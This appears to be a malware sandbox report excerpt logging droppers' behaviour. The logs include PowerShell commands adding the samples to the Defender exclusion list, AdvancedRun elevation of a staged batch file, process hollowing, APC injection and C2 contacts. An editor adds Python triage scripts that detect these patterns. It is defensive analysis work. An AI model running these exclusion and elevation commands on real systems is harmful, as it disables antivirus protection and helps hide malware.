Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\69B.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41C000
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: C8F008
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\31F4.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
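Two of the command lines in the preceding sections are worth triaging automatically: the loader spawns 32-bit PowerShell to add its own image under AppData\Local\Temp to the Defender exclusion list (Add-MpPreference -ExclusionPath), and it drops NirSoft's AdvancedRun into a GUID-named temp directory to run a staged test.bat with /RunAs 8. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses "Process created" lines in this report's format and returns structured findings. That /RunAs 8 selects TrustedInstaller is an assumption taken from AdvancedRun's documented RunAs numbering, not something the report states; every other field is read from the lines themselves.

```python
"""Added example: triage 'Process created' report lines for Defender-exclusion and elevation-helper abuse."""
import re

# Constructed input: three "Process created" lines copied from the report above
# (quotes as the sandbox prints them; the third line is a benign-looking control case).
LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force",
    r"Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run",
    r"Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'",
]

PROC_RE = re.compile(r"^Source: (\S+) Process created: (\S+) ?(.*)$")
# Any Add-MpPreference -Exclusion* argument (Path, Process, Extension), single or double quoted.
EXCL_RE = re.compile(r"Add-MpPreference.*?-(Exclusion\w+)\s+['\"]([^'\"]+)['\"]", re.I)
EXE_RE = re.compile(r"/EXEFilename\s+['\"]([^'\"]+)['\"]", re.I)
RUNAS_RE = re.compile(r"/RunAs\s+(\d+)", re.I)
TEMP_MARK = "\\appdata\\local\\temp\\"
# Assumption (not stated in the report): in NirSoft AdvancedRun's /RunAs numbering, 8 is TrustedInstaller.
RUNAS_IDENTITY = {"8": "TrustedInstaller"}


def triage(lines):
    """Return one finding dict per suspicious child process, in input order."""
    findings = []
    for line in lines:
        m = PROC_RE.match(line)
        if not m:
            continue
        parent, image, cmdline = m.groups()
        child = image.rsplit("\\", 1)[-1].lower()
        if child == "powershell.exe":
            x = EXCL_RE.search(cmdline)
            if not x:
                continue
            kind, path = x.group(1), x.group(2)
            findings.append({
                "technique": "Defender exclusion (T1562.001)",
                "parent": parent,
                "kind": kind,
                "path": path,
                # The loader excludes its own image, so Defender will not rescan it.
                "self_exclusion": path.lower() == parent.lower(),
                "user_writable": TEMP_MARK in path.lower(),
                # The command names System32 but the image is SysWOW64: a 32-bit parent
                # went through file-system redirection, so the loader itself is 32-bit.
                "wow64_redirected": "\\syswow64\\" in image.lower(),
            })
        elif child == "advancedrun.exe":
            exe = EXE_RE.search(cmdline)
            runas = RUNAS_RE.search(cmdline)
            mode = runas.group(1) if runas else None
            findings.append({
                "technique": "AdvancedRun elevation helper",
                "parent": parent,
                "exe": exe.group(1) if exe else None,
                "runas": mode,
                "identity": RUNAS_IDENTITY.get(mode, "unknown"),
                # A dropped batch/script launched through the helper is the staged payload.
                "staged_script": bool(exe) and exe.group(1).lower().endswith((".bat", ".cmd", ".ps1")),
                "helper_in_temp": TEMP_MARK in image.lower(),
            })
    return findings


if __name__ == "__main__":
    for f in triage(LINES):
        print(f)
```

On a live host the same two facts are what to check first: Get-MpPreference for ExclusionPath entries under user-writable directories, and any AdvancedRun.exe in a temp path, since a legitimate administrator has no reason to run either from there.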
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256
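Read together, the signatures in this section describe three distinct injection chains: 69B.exe starts aspnet_regbrowsers.exe suspended, unmaps its image at 0x400000 and writes a fresh PE (MZ header 4D5A) there, which is process hollowing; 31F4.exe starts a suspended copy of itself, writes a PE into it and queues an APC before resuming it, which is the early bird variant; and F7E3DjYJpC.exe (and the 9A4B, 20BD and 46D6 droppers) map a section into the already running explorer.exe and create a remote thread in it, after which explorer.exe is the process resolving the C2 domains. The Python below is an added example, not part of the Joe Sandbox report: it reads signature lines in this report's format and rebuilds those chains per source/target pair. The embedded lines are copied from the sections above; the technique labels and MITRE ATT&CK IDs are the editor's own mapping, and "unknown" thread targets are deliberately left unattributed rather than guessed.

```python
"""Added example: rebuild process-injection chains from Joe Sandbox-style signature lines."""
import re
from collections import defaultdict

# Constructed input: lines copied from the report sections above, in report order.
# Lines that do not start with "Source:" are the signature names; they give the
# following lines their context (e.g. which "Process created" is a suspended create).
REPORT = r"""
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and write
Injects a PE file into foreign processes
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Memory written: C:\Users\user\AppData\Local\Temp\31F4.exe base: 400000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Thread created: C:\Windows\explorer.exe EIP: 44E1920
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Thread created: unknown EIP: 4E51920
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\69B.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base address: 400000
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\31F4.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
"""

SRC_RE = re.compile(r"^Source: (\S+) (.*)$")
NET_RE = re.compile(r"^(?:Domain query|Network Connect): (.+)$")
# Order matters: the 4D5A (MZ header) write must be tested before the generic write.
EVENTS = [
    ("create",   re.compile(r"^Process created: (\S+)")),
    ("map",      re.compile(r"^Section loaded: unknown target: (\S+)")),
    ("alloc",    re.compile(r"^Memory allocated: (\S+)")),
    ("write_pe", re.compile(r"^Memory written: (\S+) base: \w+ value starts with: 4D5A")),
    ("write",    re.compile(r"^Memory written: (\S+)")),
    ("unmap",    re.compile(r"^Section unmapped: (\S+)")),
    ("thread",   re.compile(r"^Thread created: (\S+)")),
    ("apc",      re.compile(r"^Thread APC queued: target process: (\S+)")),
]


def classify(events):
    """Map the event set of one (source, target) pair to technique labels (editor's mapping)."""
    labels = []
    if {"create_suspended", "unmap", "write_pe"} <= events:
        labels.append("process hollowing (T1055.012)")
    if {"create_suspended", "apc"} <= events:
        labels.append("early bird APC injection (T1055.004)")
    if {"map", "thread"} <= events:
        labels.append("section mapping + remote thread (T1055)")
    if not labels and events & {"alloc", "write", "write_pe", "thread"}:
        labels.append("generic foreign-memory write (T1055)")
    return labels


def reconstruct(report_text):
    """Return ({(source, target): [labels]}, {source: [network indicators]})."""
    chains = defaultdict(set)
    network = defaultdict(list)
    header = ""
    for raw in report_text.strip().splitlines():
        line = raw.strip()
        m = SRC_RE.match(line)
        if not m:
            header = line  # signature name: context for the lines that follow
            continue
        src, rest = m.groups()
        n = NET_RE.match(rest)
        if n:
            network[src].append(n.group(1))
            continue
        for name, pat in EVENTS:
            e = pat.match(rest)
            if not e:
                continue
            target = e.group(1)
            if target == "unknown":  # sandbox could not attribute the target; do not guess
                break
            if name == "create":
                name = "create_suspended" if "suspended" in header.lower() else "create"
            chains[(src, target)].add(name)
            break
    return {pair: classify(evs) for pair, evs in chains.items()}, dict(network)


def injected_system_beacons(network):
    """Network activity from a binary under C:\\Windows is the observable side effect of the injection."""
    return {src: ind for src, ind in network.items() if src.lower().startswith("c:\\windows\\")}


if __name__ == "__main__":
    techniques, network = reconstruct(REPORT)
    for (src, target), labels in techniques.items():
        print(f"{src} -> {target}: {', '.join(labels) or 'unclassified'}")
    for src, ind in injected_system_beacons(network).items():
        print(f"{src} beacons to {ind}")
```

The point of the per-pair grouping is that none of the individual signatures is conclusive on its own (a suspended create or a foreign write each have benign uses), whereas the ordered combination of create-suspended, unmap and MZ write, or of create-suspended and queued APC, is what distinguishes hollowing from early bird in EDR telemetry as well.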
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 25_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 20_2_6AB9E730
Source: explorer.exe, 00000006.00000000.725317869.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.700663626.0000000005E50000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\69B.exe Queries volume information: C:\Users\user\AppData\Local\Temp\69B.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\69B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\69B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1254.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\31F4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3C84.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9415.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
